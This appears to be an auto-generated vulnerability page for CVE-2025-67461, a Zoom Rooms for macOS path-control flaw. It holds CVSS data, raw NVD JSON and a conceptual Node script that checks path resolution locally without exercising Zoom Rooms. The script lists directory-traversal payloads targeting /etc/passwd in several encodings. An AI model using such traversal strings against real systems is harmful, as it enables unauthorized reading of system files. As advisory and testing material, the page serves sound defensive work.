Security Vulnerability Report
CVE-2025-67461 CVSS 5.0 MEDIUM

CVE-2025-67461

Published: 2025-12-10 21:16:10
Last Modified: 2025-12-30 18:23:47

Description

External control of file name or path in Zoom Rooms for macOS before version 6.6.0 may allow an authenticated user to conduct a disclosure of information via local access.

CVSS Details

CVSS Score
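5.0 (the record's "Secondary" assessment; the "Primary" assessment in the raw JSON below scores 5.5, with UI:N instead of UI:R)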
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:* - VULNERABLE
Zoom Rooms for macOS < 6.6.0

PoC / Exploit Code

⚠ For Security Research Only
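The following code is for security research and authorized testing only. It is a conceptual script: it evaluates path strings locally with Node's path module and does not send any input to Zoom Rooms, so its output does not show whether an installed build is affected.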
javascript
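// CVE-2025-67461 - Zoom Rooms for macOS before 6.6.0
// External control of file name or path, leading to local information disclosure.
//
// Scope of this script: it is conceptual and never passes input to Zoom Rooms.
// It joins sample traversal strings onto the install directory with Node's
// `path` module and reports whether the resulting string leaves that directory.
// The outcome is the same on every host where the bundle exists, patched or
// not, so it must not be read as a vulnerability verdict. To assess exposure,
// compare the installed Zoom Rooms version against 6.6.0.
const fs = require('fs');
const path = require('path');

// Install location this script looks for.
const ZOOM_ROOMS_PATH = '/Applications/ZoomRooms.app/';

// Sample traversal strings: plain, backslash-separated, percent-encoded,
// double-encoded and overlong-UTF-8 forms. Node's path functions do not decode
// the encoded forms, so those always resolve inside the base directory here;
// whether an application decodes them before use is outside what this shows.
const payloads = [
  '../../../../etc/passwd',
  '../../../../Users/Shared/ZoomRooms/config/../../../../../etc/passwd',
  '..\\..\\..\\..\\etc\\passwd',
  '%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',
  '..%252f..%252f..%252f..%252fetc%252fpasswd',
  '%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afpasswd',
];

/**
 * Report whether the Zoom Rooms application bundle exists at ZOOM_ROOMS_PATH.
 *
 * @returns {boolean} true when the path exists on this host.
 */
function checkZoomRoomsInstalled() {
  // fs.existsSync reports failures as `false` rather than throwing, so no
  // try/catch is needed around it.
  return fs.existsSync(ZOOM_ROOMS_PATH);
}

/**
 * Resolve `candidate` against `baseDir` and decide whether the result is still
 * inside `baseDir`.
 *
 * The decision uses path.relative instead of a string-prefix test: a prefix
 * test accepts sibling paths that merely share the prefix whenever the base is
 * written without a trailing separator.
 *
 * @param {string} baseDir - directory the candidate is expected to stay within.
 * @param {string} candidate - relative path string to evaluate.
 * @returns {{resolved: string, contained: boolean}} the resolved path and
 *   whether it lies within `baseDir`.
 */
function resolveWithinBase(baseDir, candidate) {
  const base = path.resolve(baseDir);
  const resolved = path.resolve(base, candidate);
  const relative = path.relative(base, resolved);
  const contained =
    relative === '' ||
    (relative !== '..' &&
      !relative.startsWith(`..${path.sep}`) &&
      !path.isAbsolute(relative));
  return { resolved, contained };
}

/**
 * Print, for each sample string, whether it resolves inside or outside the
 * Zoom Rooms install directory under Node's path handling.
 *
 * Does nothing beyond a notice when the bundle is not present. Output labels
 * describe the string arithmetic only, not the state of the installed product.
 *
 * @returns {void}
 */
function testPathTraversal() {
  if (!checkZoomRoomsInstalled()) {
    console.log('Zoom Rooms not found on this system');
    return;
  }

  console.log('CVE-2025-67461: local path-resolution check (does not exercise Zoom Rooms)');
  console.log('Affected: Zoom Rooms for macOS < 6.6.0');
  console.log('Weakness: External control of file name or path');

  for (const payload of payloads) {
    const { resolved, contained } = resolveWithinBase(ZOOM_ROOMS_PATH, payload);
    if (contained) {
      console.log(`[CONTAINED] ${payload}`);
    } else {
      console.log(`[ESCAPES BASE] ${payload}`);
      console.log(`[ESCAPES BASE] Resolved path: ${resolved}`);
    }
  }

  console.log('\nThese results describe path resolution only; they do not show whether the installed build is affected.');
  console.log('Recommended action: Upgrade to Zoom Rooms for macOS 6.6.0 or later');
}

testPathTraversal();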

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67461", "sourceIdentifier": "[email protected]", "published": "2025-12-10T21:16:09.797", "lastModified": "2025-12-30T18:23:47.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "External control of file name or path in Zoom Rooms for macOS before version 6.6.0 may allow an authenticated user to conduct a disclosure of information via local access."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zoom:rooms:*:*:*:*:*:macos:*:*", "versionEndExcluding": "6.6.0", "matchCriteriaId": "637C04EF-8386-47E5-8D3D-7030664A42A5"}]}]}], "references": [{"url": "https://www.zoom.com/en/trust/security-bulletin/zsb-25051", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}